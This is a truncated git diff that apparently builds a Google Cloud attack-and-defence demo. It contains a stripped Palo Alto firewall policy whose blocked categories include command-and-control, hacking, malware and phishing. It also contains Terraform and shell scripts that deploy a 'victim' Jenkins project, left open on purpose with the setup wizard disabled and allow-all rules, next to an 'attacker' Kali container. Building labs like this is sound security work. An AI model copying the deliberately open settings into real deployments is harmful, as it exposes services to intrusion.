+ internet-communications-and-telephony
+ internet-portals
+ job-search
+ legal
+ military
+ motor-vehicles
+ music
+ news
+ not-resolved
+ nudity
+ online-storage-and-backup
+ parked
+ peer-to-peer
+ personal-sites-and-blogs
+ philosophy-and-political-advocacy
+ private-ip-addresses
+ proxy-avoidance-and-anonymizers
+ questionable
+ real-estate
+ recreation-and-hobbies
+ reference-and-research
+ religion
+ search-engines
+ sex-education
+ shareware-and-freeware
+ shopping
+ social-networking
+ society
+ sports
+ stock-advice-and-tools
+ streaming-media
+ swimsuits-and-intimate-apparel
+ training-and-tools
+ translation
+ travel
+ unknown
+ weapons
+ web-advertisements
+ web-based-email
+ web-hosting
+ White-List
+
+
+ command-and-control
+ hacking
+ malware
+ phishing
+ Black-List
+
+
+
+
+
+
+
+ medium
+
+ White-List
+
+
+ abortion
+ abused-drugs
+ adult
+ alcohol-and-tobacco
+ auctions
+ business-and-economy
+ command-and-control
+ computer-and-internet-info
+ content-delivery-networks
+ copyright-infringement
+ dating
+ dynamic-dns
+ educational-institutions
+ entertainment-and-arts
+ extremism
+ financial-services
+ gambling
+ games
+ government
+ hacking
+ health-and-medicine
+ home-and-garden
+ hunting-and-fishing
+ insufficient-content
+ internet-communications-and-telephony
+ internet-portals
+ job-search
+ legal
+ malware
+ military
+ motor-vehicles
+ music
+ news
+ not-resolved
+ nudity
+ online-storage-and-backup
+ parked
+ peer-to-peer
+ personal-sites-and-blogs
+ philosophy-and-political-advocacy
+ phishing
+ private-ip-addresses
+ proxy-avoidance-and-anonymizers
+ questionable
+ real-estate
+ recreation-and-hobbies
+ reference-and-research
+ religion
+ search-engines
+ sex-education
+ shareware-and-freeware
+ shopping
+ social-networking
+ society
+ sports
+ stock-advice-and-tools
+ streaming-media
+ swimsuits-and-intimate-apparel
+ training-and-tools
+ translation
+ travel
+ unknown
+ weapons
+ web-advertisements
+ web-based-email
+ web-hosting
+ Black-List
+ Custom-No-Decrypt
+
+
+ block
+ yes
+ yes
+ yes
+ no
+
+ White-List
+
+
+ abortion
+ abused-drugs
+ adult
+ alcohol-and-tobacco
+ auctions
+ business-and-economy
+ command-and-control
+ computer-and-internet-info
+ content-delivery-networks
+ copyright-infringement
+ dating
+ dynamic-dns
+ educational-institutions
+ entertainment-and-arts
+ extremism
+ financial-services
+ gambling
+ games
+ government
+ hacking
+ health-and-medicine
+ home-and-garden
+ hunting-and-fishing
+ insufficient-content
+ internet-communications-and-telephony
+ internet-portals
+ job-search
+ legal
+ malware
+ military
+ motor-vehicles
+ music
+ news
+ not-resolved
+ nudity
+ online-storage-and-backup
+ parked
+ peer-to-peer
+ personal-sites-and-blogs
+ philosophy-and-political-advocacy
+ phishing
+ private-ip-addresses
+ proxy-avoidance-and-anonymizers
+ questionable
+ real-estate
+ recreation-and-hobbies
+ reference-and-research
+ religion
+ search-engines
+ sex-education
+ shareware-and-freeware
+ shopping
+ social-networking
+ society
+ sports
+ stock-advice-and-tools
+ streaming-media
+ swimsuits-and-intimate-apparel
+ training-and-tools
+ translation
+ travel
+ unknown
+ weapons
+ web-advertisements
+ web-based-email
+ web-hosting
+ Black-List
+ Custom-No-Decrypt
+
+
+
+
+
+
+
+ medium
+
+ Black-List
+ Custom-No-Decrypt
+ White-List
+
+
+ block
+ yes
+ yes
+ yes
+ no
+
+ abortion
+ abused-drugs
+ adult
+ alcohol-and-tobacco
+ auctions
+ business-and-economy
+ command-and-control
+ computer-and-internet-info
+ content-delivery-networks
+ copyright-infringement
+ dating
+ dynamic-dns
+ educational-institutions
+ entertainment-and-arts
+ extremism
+ financial-services
+ gambling
+ games
+ government
+ hacking
+ health-and-medicine
+ home-and-garden
+ hunting-and-fishing
+ insufficient-content
+ internet-communications-and-telephony
+ internet-portals
+ job-search
+ legal
+ malware
+ military
+ motor-vehicles
+ music
+ news
+ not-resolved
+ nudity
+ online-storage-and-backup
+ parked
+ peer-to-peer
+ personal-sites-and-blogs
+ philosophy-and-political-advocacy
+ phishing
+ private-ip-addresses
+ proxy-avoidance-and-anonymizers
+ questionable
+ real-estate
+ recreation-and-hobbies
+ reference-and-research
+ religion
+ search-engines
+ sex-education
+ shareware-and-freeware
+ shopping
+ social-networking
+ society
+ stock-advice-and-tools
+ streaming-media
+ swimsuits-and-intimate-apparel
+ training-and-tools
+ translation
+ travel
+ unknown
+ weapons
+ web-advertisements
+ web-based-email
+ web-hosting
+ Black-List
+ Custom-No-Decrypt
+ White-List
+
+
+
+
+
+
+
+ alert
+ alert
+
+
+ alert
+ alert
+
+
+ default
+ default
+
+
+ default
+ default
+
+
+ alert
+ alert
+
+
+ default
+ default
+
+
+
+
+
+
+ default
+ reset-both
+
+
+ default
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+ default
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+
+
+
+
+ default
+ reset-both
+
+
+ default
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+ default
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+
+
+
+
+ default
+ reset-both
+
+
+ default
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+ default
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+
+
+
+
+ default
+ default
+
+
+ default
+ default
+
+
+ reset-both
+ reset-both
+
+
+ reset-both
+ reset-both
+
+
+ default
+ default
+
+
+ reset-both
+ reset-both
+
+
+ Use this profile for rules needing modifications to the standard
+
+
+
+
+ drop
+ drop
+
+
+ drop
+ drop
+
+
+ drop
+ drop
+
+
+ drop
+ drop
+
+
+ drop
+ drop
+
+
+ drop
+ drop
+
+
+ yes
+
+
+
+
+
+
+
+
+
+
+ any
+
+
+ critical
+ high
+ medium
+
+
+ any
+
+ any
+ any
+ any
+ single-packet
+
+
+
+
+
+
+ any
+
+
+ low
+ informational
+
+
+ any
+
+ any
+ any
+ any
+ disable
+
+
+
+
+
+
+
+
+
+
+ any
+
+
+ critical
+ high
+ medium
+
+
+ any
+
+ any
+ any
+ any
+ single-packet
+
+
+
+
+
+
+ any
+
+
+ low
+ informational
+
+
+ any
+
+ any
+ any
+ any
+ disable
+
+
+
+
+
+
+
+
+
+
+ any
+
+
+ critical
+ high
+
+
+ any
+
+ any
+ any
+ any
+ single-packet
+
+
+
+
+
+
+ any
+
+
+ low
+ informational
+ medium
+
+
+ any
+
+ any
+ any
+ any
+ disable
+
+
+
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+ any
+ any
+ any
+ disable
+
+
+
+
+
+
+
+
+
+
+
+ any
+
+
+ critical
+ high
+ medium
+ low
+
+
+ any
+
+ any
+ any
+ any
+ single-packet
+
+
+
+
+
+
+ Internal
+
+
+ informational
+
+
+ any
+
+ any
+ any
+ any
+ disable
+
+
+
+
+
+
+ any
+
+
+ informational
+
+
+ any
+
+ any
+ any
+ any
+ extended-capture
+
+
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+ both
+ public-cloud
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+ both
+ public-cloud
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+ both
+ public-cloud
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+ both
+ public-cloud
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+ both
+ public-cloud
+
+
+
+
+
+
+
+
+ Outbound-AV
+
+
+ Outbound-AS
+
+
+ Outbound-VP
+
+
+ Outbound-URL
+
+
+ Outbound-FB
+
+
+ Outbound-WF
+
+
+
+
+ Inbound-AV
+
+
+ Inbound-AS
+
+
+ Inbound-VP
+
+
+ Inbound-FB
+
+
+ Inbound-WF
+
+
+
+
+ Internal-AV
+
+
+ Internal-AS
+
+
+ Internal-VP
+
+
+ Internal-FB
+
+
+ Internal-WF
+
+
+
+
+ Alert-Only-AV
+
+
+ Alert-Only-AS
+
+
+ Alert-Only-VP
+
+
+ Alert-Only-URL
+
+
+ Alert-Only-FB
+
+
+ Alert-Only-WF
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/init-cfg.txt b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/init-cfg.txt
new file mode 100644
index 00000000..04c10233
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/init-cfg.txt
@@ -0,0 +1,3 @@
+dns-primary=8.8.8.8
+dns-secondary=8.8.4.4
+op-command-modes=mgmt-interface-swap
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/null.txt b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/null.txt
new file mode 100644
index 00000000..8b137891
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/null.txt
@@ -0,0 +1 @@
+
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/firewall.tf b/gcp/Jenkins_proj-master/WebInDeploy/firewall.tf
new file mode 100644
index 00000000..7e1b2cdb
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/firewall.tf
@@ -0,0 +1,57 @@
+resource "google_compute_instance" "firewall" {
+ project = "${google_project.victim_project.id}"
+ name = "firewall"
+ machine_type = "n1-standard-4"
+ zone = "${var.GCP_Zone}"
+ min_cpu_platform = "Intel Skylake"
+ can_ip_forward = true
+ allow_stopping_for_update = true
+ timeouts = {
+ create = "15m"
+ delete = "60m"
+ }
+ depends_on = ["google_storage_bucket_object.init_cfg",
+ "google_storage_bucket_object.bootstrap",
+ "google_storage_bucket_object.content",
+ "google_storage_bucket_object.software",
+ "google_storage_bucket_object.license",
+ "google_project_service.victim_project"
+ ]
+ // Adding METADATA Key Value pairs to VM-Series GCE instance
+ metadata {
+ vmseries-bootstrap-gce-storagebucket = "${google_storage_bucket.bootstrap_bucket.name}"
+ serial-port-enable = true
+ }
+
+ service_account {
+ scopes = [
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ ]
+ }
+
+ network_interface {
+ subnetwork = "${google_compute_subnetwork.untrust_subnet.self_link}"
+ network_ip = "${var.FW_Untrust_IP}"
+ access_config = {}
+ }
+
+ network_interface {
+ subnetwork = "${google_compute_subnetwork.management_subnet.self_link}"
+ network_ip = "${var.FW_Mgmt_IP}"
+ access_config = {}
+ }
+
+ network_interface {
+ subnetwork = "${google_compute_subnetwork.trust_subnet.self_link}"
+ network_ip = "${var.FW_Trust_IP}"
+ }
+
+ boot_disk {
+ initialize_params {
+ image = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle2-814"
+ }
+ }
+}
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/gcp_firewall.tf b/gcp/Jenkins_proj-master/WebInDeploy/gcp_firewall.tf
new file mode 100644
index 00000000..382aaade
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/gcp_firewall.tf
@@ -0,0 +1,34 @@
+resource "google_compute_firewall" "management" {
+ name = "management-firewall"
+ project = "${google_project.victim_project.id}"
+ network = "${google_compute_network.management_network.name}"
+ allow {
+ protocol = "tcp"
+ ports = ["22", "443"]
+ }
+}
+resource "google_compute_firewall" "untrust" {
+ name = "untrust-firewall"
+ project = "${google_project.victim_project.id}"
+ network = "${google_compute_network.untrust_network.name}"
+ allow {
+ protocol = "tcp"
+ }
+}
+resource "google_compute_firewall" "trust" {
+ name = "trust-firewall"
+ project = "${google_project.victim_project.id}"
+ network = "${google_compute_network.trust_network.name}"
+ allow {
+ protocol = "tcp"
+ }
+}
+resource "google_compute_firewall" "attacker" {
+ name = "attacker-firewall"
+ project = "${google_project.attacker_project.id}"
+ network = "${google_compute_network.attacker_network.name}"
+ allow {
+ protocol = "tcp"
+ ports = ["22", "443", "5000"]
+ }
+}
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/gcp_vars.tf b/gcp/Jenkins_proj-master/WebInDeploy/gcp_vars.tf
new file mode 100644
index 00000000..793bc6c5
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/gcp_vars.tf
@@ -0,0 +1,16 @@
+variable "Billing_Account" {}
+variable "Victim_Project_Name" {}
+variable "Attacker_Project_Name" {}
+variable "GCP_Region" {}
+variable "GCP_Zone" {}
+variable "Management_Subnet_CIDR" {}
+variable "Untrust_Subnet_CIDR" {}
+variable "Trust_Subnet_CIDR" {}
+variable "Attacker_Subnet_CIDR" {}
+variable "FW_Mgmt_IP" {}
+variable "FW_Untrust_IP" {}
+variable "FW_Trust_IP" {}
+variable "WebLB_IP" {}
+variable "Webserver_IP1" {}
+variable "Webserver_IP2" {}
+variable "Attacker_IP" {}
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/initialize_attacker.sh b/gcp/Jenkins_proj-master/WebInDeploy/initialize_attacker.sh
new file mode 100644
index 00000000..032feb65
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/initialize_attacker.sh
@@ -0,0 +1,14 @@
+#!/bin/bash
+apt-get update
+apt-get update
+apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
+pip3 install docker-compose
+cd /var/tmp
+echo "version: '3'" > docker-compose.yml
+echo "services:" >> docker-compose.yml
+echo " attacker:" >> docker-compose.yml
+echo " image: pglynn/kali:latest" >> docker-compose.yml
+echo " ports:" >> docker-compose.yml
+echo " - \"443:443\"" >> docker-compose.yml
+echo " - \"5000:5000\"" >> docker-compose.yml
+docker-compose up -d
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/initialize_webserver.sh b/gcp/Jenkins_proj-master/WebInDeploy/initialize_webserver.sh
new file mode 100644
index 00000000..55324851
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/initialize_webserver.sh
@@ -0,0 +1,17 @@
+#!/bin/bash
+apt-get update
+apt-get update
+apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
+pip3 install docker-compose
+cd /var/tmp
+echo "version: '3'" > docker-compose.yml
+echo "services:" >> docker-compose.yml
+echo " jenkins:" >> docker-compose.yml
+echo " image: pglynn/jenkins:version1.0" >> docker-compose.yml
+echo " environment:" >> docker-compose.yml
+echo " JAVA_OPTS: \"-Djava.awt.headless=true\"" >> docker-compose.yml
+echo " JAVA_OPTS: \"-Djenkins.install.runSetupWizard=false\"" >> docker-compose.yml
+echo " ports:" >> docker-compose.yml
+echo " - \"50000:50000\"" >> docker-compose.yml
+echo " - \"8080:8080\"" >> docker-compose.yml
+docker-compose up -d
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/lb-firewall.tf b/gcp/Jenkins_proj-master/WebInDeploy/lb-firewall.tf
new file mode 100644
index 00000000..2897a657
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/lb-firewall.tf
@@ -0,0 +1,147 @@
+resource "google_compute_instance_group" "firewalls" {
+ name = "firewalls-instance-group"
+ description = "An instance group for the single FW instance"
+ project = "${google_project.victim_project.id}"
+ zone = "${var.GCP_Zone}"
+
+ instances = [
+ "${google_compute_instance.firewall.self_link}",
+ ]
+ named_port {
+ name = "http-8080"
+ port = "8080"
+ }
+}
+resource "google_compute_target_pool" "firewalls" {
+ name = "armor-pool-firewalls"
+ project = "${google_project.victim_project.id}"
+
+ instances = [
+ "${google_compute_instance.firewall.self_link}",
+ ]
+
+ health_checks = [
+ "${google_compute_http_health_check.health.name}",
+ ]
+}
+resource "google_compute_backend_service" "firewalls" {
+ name = "armor-backend-firewalls"
+ description = "With FW"
+ project = "${google_project.victim_project.id}"
+ port_name = "http-8080"
+ protocol = "HTTP"
+ timeout_sec = 10
+ enable_cdn = false
+
+ backend {
+ group = "${google_compute_instance_group.firewalls.self_link}"
+ }
+
+ security_policy = "${google_compute_security_policy.security-policy-firewalls.self_link}"
+
+ health_checks = ["${google_compute_http_health_check.health.self_link}"]
+}
+resource "google_compute_security_policy" "security-policy-firewalls" {
+ name = "armor-security-policy-firewalls"
+ description = "example security policy"
+ project = "${google_project.victim_project.id}"
+
+ # Reject all traffic that hasn't been whitelisted.
+ rule {
+ action = "deny(403)"
+ priority = "2147483647"
+
+ match {
+ versioned_expr = "SRC_IPS_V1"
+
+ config {
+ src_ip_ranges = ["*"]
+ }
+ }
+
+ description = "Default rule, higher priority overrides it"
+ }
+ # Whitelist traffic from certain ip address
+ rule {
+ action = "allow"
+ priority = "1000"
+
+ match {
+ versioned_expr = "SRC_IPS_V1"
+
+ config {
+ src_ip_ranges = ["0.0.0.0/0"]
+ }
+ }
+ }
+}
+resource "google_compute_global_forwarding_rule" "firewalls" {
+ name = "armor-rule-firewalls"
+ project = "${google_project.victim_project.id}"
+ target = "${google_compute_target_http_proxy.firewalls.self_link}"
+ port_range = "80"
+}
+resource "google_compute_target_http_proxy" "firewalls" {
+ name = "armor-proxy-firewalls"
+ project = "${google_project.victim_project.id}"
+ url_map = "${google_compute_url_map.firewalls.self_link}"
+}
+resource "google_compute_url_map" "firewalls" {
+ name = "armor-url-map-firewalls"
+ project = "${google_project.victim_project.id}"
+ default_service = "${google_compute_backend_service.firewalls.self_link}"
+
+ host_rule {
+ hosts = ["with-firewalls.com"]
+ path_matcher = "allpaths"
+ }
+ path_matcher {
+ name = "allpaths"
+ default_service = "${google_compute_backend_service.firewalls.self_link}"
+
+ path_rule {
+ paths = ["/*"]
+ service = "${google_compute_backend_service.firewalls.self_link}"
+ }
+ }
+}
+resource "google_compute_health_check" "tcp-8080" {
+ name = "tcp-8080"
+ project = "${google_project.victim_project.id}"
+ check_interval_sec = 1
+ timeout_sec = 1
+
+ tcp_health_check {
+ port = "8080"
+ }
+}
+resource "google_compute_instance_group" "ilb-webservers" {
+ name = "ilb-webserver-instance-group"
+ description = "An instance group for the webserver"
+ project = "${google_project.victim_project.id}"
+ zone = "${var.GCP_Zone}"
+
+ instances = [
+ "${google_compute_instance.jenkins2.self_link}",
+ ]
+}
+resource "google_compute_region_backend_service" "ilb-webserver" {
+ name = "ilb-webserver"
+ project = "${google_project.victim_project.id}"
+ region = "${var.GCP_Region}"
+ health_checks = ["${google_compute_health_check.tcp-8080.self_link}"]
+
+ backend {
+ group = "${google_compute_instance_group.ilb-webservers.self_link}"
+ }
+}
+resource "google_compute_forwarding_rule" "ilb-webserver-forwarding-rule" {
+ name = "ilb-webserver-forwarding-rule"
+ project = "${google_project.victim_project.id}"
+ load_balancing_scheme = "INTERNAL"
+ ip_address = "${var.WebLB_IP}"
+ ports = ["8080"]
+ network = "${google_compute_network.trust_network.self_link}"
+ subnetwork = "${google_compute_subnetwork.trust_subnet.self_link}"
+ backend_service = "${google_compute_region_backend_service.ilb-webserver.self_link}"
+}
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/lb-webserver.tf b/gcp/Jenkins_proj-master/WebInDeploy/lb-webserver.tf
new file mode 100644
index 00000000..6f4d872a
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/lb-webserver.tf
@@ -0,0 +1,115 @@
+resource "google_compute_instance_group" "webservers" {
+ name = "webserver-instance-group"
+ description = "An instance group for the webserver"
+ project = "${google_project.victim_project.id}"
+ zone = "${var.GCP_Zone}"
+
+ instances = [
+ "${google_compute_instance.jenkins1.self_link}",
+ ]
+ named_port {
+ name = "http-8080"
+ port = "8080"
+ }
+}
+resource "google_compute_target_pool" "webservers" {
+ name = "armor-pool-webservers"
+ project = "${google_project.victim_project.id}"
+
+ instances = [
+ "${google_compute_instance.jenkins1.self_link}",
+ ]
+
+ health_checks = [
+ "${google_compute_http_health_check.health.name}",
+ ]
+}
+resource "google_compute_http_health_check" "health" {
+ name = "armor-healthcheck"
+ project = "${google_project.victim_project.id}"
+ port = 8080
+ request_path = "/"
+ check_interval_sec = 1
+ timeout_sec = 1
+}
+resource "google_compute_backend_service" "webservers" {
+ name = "armor-backend-webservers"
+ description = "Our company website"
+ project = "${google_project.victim_project.id}"
+ port_name = "http-8080"
+ protocol = "HTTP"
+ timeout_sec = 10
+ enable_cdn = false
+
+ backend {
+ group = "${google_compute_instance_group.webservers.self_link}"
+ }
+
+ security_policy = "${google_compute_security_policy.security-policy-webservers.self_link}"
+
+ health_checks = ["${google_compute_http_health_check.health.self_link}"]
+}
+resource "google_compute_security_policy" "security-policy-webservers" {
+ name = "armor-security-policy-webservers"
+ description = "example security policy"
+ project = "${google_project.victim_project.id}"
+
+ # Reject all traffic that hasn't been whitelisted.
+ rule {
+ action = "deny(403)"
+ priority = "2147483647"
+
+ match {
+ versioned_expr = "SRC_IPS_V1"
+
+ config {
+ src_ip_ranges = ["*"]
+ }
+ }
+
+ description = "Default rule, higher priority overrides it"
+ }
+ # Whitelist traffic from certain ip address
+ rule {
+ action = "allow"
+ priority = "1000"
+
+ match {
+ versioned_expr = "SRC_IPS_V1"
+
+ config {
+ src_ip_ranges = ["0.0.0.0/0"]
+ }
+ }
+ }
+}
+resource "google_compute_global_forwarding_rule" "webservers" {
+ name = "armor-rule-webservers"
+ project = "${google_project.victim_project.id}"
+ target = "${google_compute_target_http_proxy.webservers.self_link}"
+ port_range = "80"
+}
+resource "google_compute_target_http_proxy" "webservers" {
+ name = "armor-proxy-webservers"
+ project = "${google_project.victim_project.id}"
+ url_map = "${google_compute_url_map.webservers.self_link}"
+}
+resource "google_compute_url_map" "webservers" {
+ name = "armor-url-map-webservers"
+ project = "${google_project.victim_project.id}"
+ default_service = "${google_compute_backend_service.webservers.self_link}"
+
+ host_rule {
+ hosts = ["sans-firewalls.com"]
+ path_matcher = "allpaths"
+ }
+ path_matcher {
+ name = "allpaths"
+ default_service = "${google_compute_backend_service.webservers.self_link}"
+
+ path_rule {
+ paths = ["/*"]
+ service = "${google_compute_backend_service.webservers.self_link}"
+ }
+ }
+}
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/main.tf b/gcp/Jenkins_proj-master/WebInDeploy/main.tf
new file mode 100644
index 00000000..2039e938
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/main.tf
@@ -0,0 +1,5 @@
+provider "google" {
+ region = "${var.GCP_Region}"
+}
+
+provider "random" {}
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/output.tf b/gcp/Jenkins_proj-master/WebInDeploy/output.tf
new file mode 100644
index 00000000..b96cf54d
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/output.tf
@@ -0,0 +1,15 @@
+output "FW_Mgmt_IP" {
+ value = "${google_compute_instance.firewall.network_interface.1.access_config.0.nat_ip}"
+}
+
+output "ALB-DNS" {
+ value = "${google_compute_global_forwarding_rule.firewalls.ip_address}"
+}
+
+output "NATIVE-DNS" {
+ value = "${google_compute_global_forwarding_rule.webservers.ip_address}"
+}
+
+output "ATTACKER_IP" {
+ value = "${google_compute_instance.attacker.network_interface.0.access_config.0.nat_ip}"
+}
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/project.tf b/gcp/Jenkins_proj-master/WebInDeploy/project.tf
new file mode 100644
index 00000000..10a1036d
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/project.tf
@@ -0,0 +1,25 @@
+resource "random_id" "project_number" {
+ byte_length = 2
+}
+resource "google_project" "victim_project" {
+ name = "${var.Victim_Project_Name}-${random_id.project_number.hex}"
+ project_id = "${var.Victim_Project_Name}-${random_id.project_number.hex}"
+ billing_account = "${var.Billing_Account}"
+ auto_create_network = false
+}
+resource "google_project_service" "victim_project" {
+ project = "${google_project.victim_project.project_id}",
+ service = "storage-api.googleapis.com"
+ disable_dependent_services = true
+}
+resource "google_project" "attacker_project" {
+ name = "${var.Attacker_Project_Name}-${random_id.project_number.hex}"
+ project_id = "${var.Attacker_Project_Name}-${random_id.project_number.hex}"
+ billing_account = "${var.Billing_Account}"
+ auto_create_network = false
+}
+resource "google_project_service" "attacker_project" {
+ project = "${google_project.attacker_project.project_id}",
+ service = "storage-api.googleapis.com"
+ disable_dependent_services = true
+}
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/scripts/initialize_attacker.sh b/gcp/Jenkins_proj-master/WebInDeploy/scripts/initialize_attacker.sh
new file mode 100644
index 00000000..032feb65
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/scripts/initialize_attacker.sh
@@ -0,0 +1,14 @@
+#!/bin/bash
+apt-get update
+apt-get update
+apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
+pip3 install docker-compose
+cd /var/tmp
+echo "version: '3'" > docker-compose.yml
+echo "services:" >> docker-compose.yml
+echo " attacker:" >> docker-compose.yml
+echo " image: pglynn/kali:latest" >> docker-compose.yml
+echo " ports:" >> docker-compose.yml
+echo " - \"443:443\"" >> docker-compose.yml
+echo " - \"5000:5000\"" >> docker-compose.yml
+docker-compose up -d
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh b/gcp/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh
new file mode 100644
index 00000000..bb37c3e5
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh
@@ -0,0 +1,17 @@
+#!/bin/bash
+apt-get update
+apt-get update
+apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
+pip3 install docker-compose
+cd /var/tmp
+echo "version: '3'" > docker-compose.yml
+echo "services:" >> docker-compose.yml
+echo " jenkins:" >> docker-compose.yml
+echo " image: pglynn/jenkins:latest" >> docker-compose.yml
+echo " environment:" >> docker-compose.yml
+echo " JAVA_OPTS: \"-Djava.awt.headless=true\"" >> docker-compose.yml
+echo " JAVA_OPTS: \"-Djenkins.install.runSetupWizard=false\"" >> docker-compose.yml
+echo " ports:" >> docker-compose.yml
+echo " - \"50000:50000\"" >> docker-compose.yml
+echo " - \"8080:8080\"" >> docker-compose.yml
+docker-compose up -d
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/terraform.tfvars b/gcp/Jenkins_proj-master/WebInDeploy/terraform.tfvars
new file mode 100644
index 00000000..20f487e7
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/terraform.tfvars
@@ -0,0 +1,31 @@
+Billing_Account = ""
+
+Attacker_Project_Name = "attacker"
+
+Victim_Project_Name = "jenkins"
+
+GCP_Region = "us-central1"
+
+GCP_Zone = "us-central1-a"
+
+Management_Subnet_CIDR = "10.0.0.0/24"
+
+Untrust_Subnet_CIDR = "10.0.1.0/24"
+
+Trust_Subnet_CIDR = "10.0.2.0/24"
+
+Attacker_Subnet_CIDR = "10.1.1.0/24"
+
+FW_Mgmt_IP = "10.0.0.10"
+
+FW_Untrust_IP = "10.0.1.10"
+
+FW_Trust_IP = "10.0.2.10"
+
+WebLB_IP = "10.0.2.30"
+
+Webserver_IP1 = "10.0.2.50"
+
+Webserver_IP2 = "10.0.2.60"
+
+Attacker_IP = "10.1.1.50"
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/vpc-subnets.tf b/gcp/Jenkins_proj-master/WebInDeploy/vpc-subnets.tf
new file mode 100644
index 00000000..811e40dd
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/vpc-subnets.tf
@@ -0,0 +1,48 @@
+resource "google_compute_network" "management_network" {
+ project = "${google_project.victim_project.id}"
+ name = "management"
+ auto_create_subnetworks = false
+}
+resource "google_compute_network" "untrust_network" {
+ project = "${google_project.victim_project.id}"
+ name = "untrust"
+ auto_create_subnetworks = false
+}
+resource "google_compute_network" "trust_network" {
+ project = "${google_project.victim_project.id}"
+ name = "trust"
+ auto_create_subnetworks = false
+}
+resource "google_compute_network" "attacker_network" {
+ project = "${google_project.attacker_project.id}"
+ name = "attacker"
+ auto_create_subnetworks = false
+}
+resource "google_compute_subnetwork" "management_subnet" {
+ name = "management"
+ project = "${google_project.victim_project.id}"
+ region = "${var.GCP_Region}"
+ ip_cidr_range = "${var.Management_Subnet_CIDR}"
+ network = "${google_compute_network.management_network.self_link}"
+}
+resource "google_compute_subnetwork" "untrust_subnet" {
+ name = "untrust"
+ project = "${google_project.victim_project.id}"
+ region = "${var.GCP_Region}"
+ ip_cidr_range = "${var.Untrust_Subnet_CIDR}"
+ network = "${google_compute_network.untrust_network.self_link}"
+}
+resource "google_compute_subnetwork" "trust_subnet" {
+ name = "trust"
+ project = "${google_project.victim_project.id}"
+ region = "${var.GCP_Region}"
+ ip_cidr_range = "${var.Trust_Subnet_CIDR}"
+ network = "${google_compute_network.trust_network.self_link}"
+}
+resource "google_compute_subnetwork" "attacker_subnet" {
+ name = "attacker"
+ project = "${google_project.attacker_project.id}"
+ region = "${var.GCP_Region}"
+ ip_cidr_range = "${var.Attacker_Subnet_CIDR}"
+ network = "${google_compute_network.attacker_network.self_link}"
+}
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/webservers.tf b/gcp/Jenkins_proj-master/WebInDeploy/webservers.tf
new file mode 100644
index 00000000..bb9d328e
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/webservers.tf
@@ -0,0 +1,80 @@
+resource "google_compute_instance" "jenkins1" {
+ name = "jenkins1"
+ project = "${google_project.victim_project.id}"
+ zone = "${var.GCP_Zone}"
+ machine_type = "n1-standard-1"
+ allow_stopping_for_update = true
+ timeouts = {
+ create = "15m"
+ delete = "60m"
+ }
+ depends_on = [
+ "google_storage_bucket_object.config_file_webserver",
+ "google_project_service.victim_project"
+ ]
+ metadata {
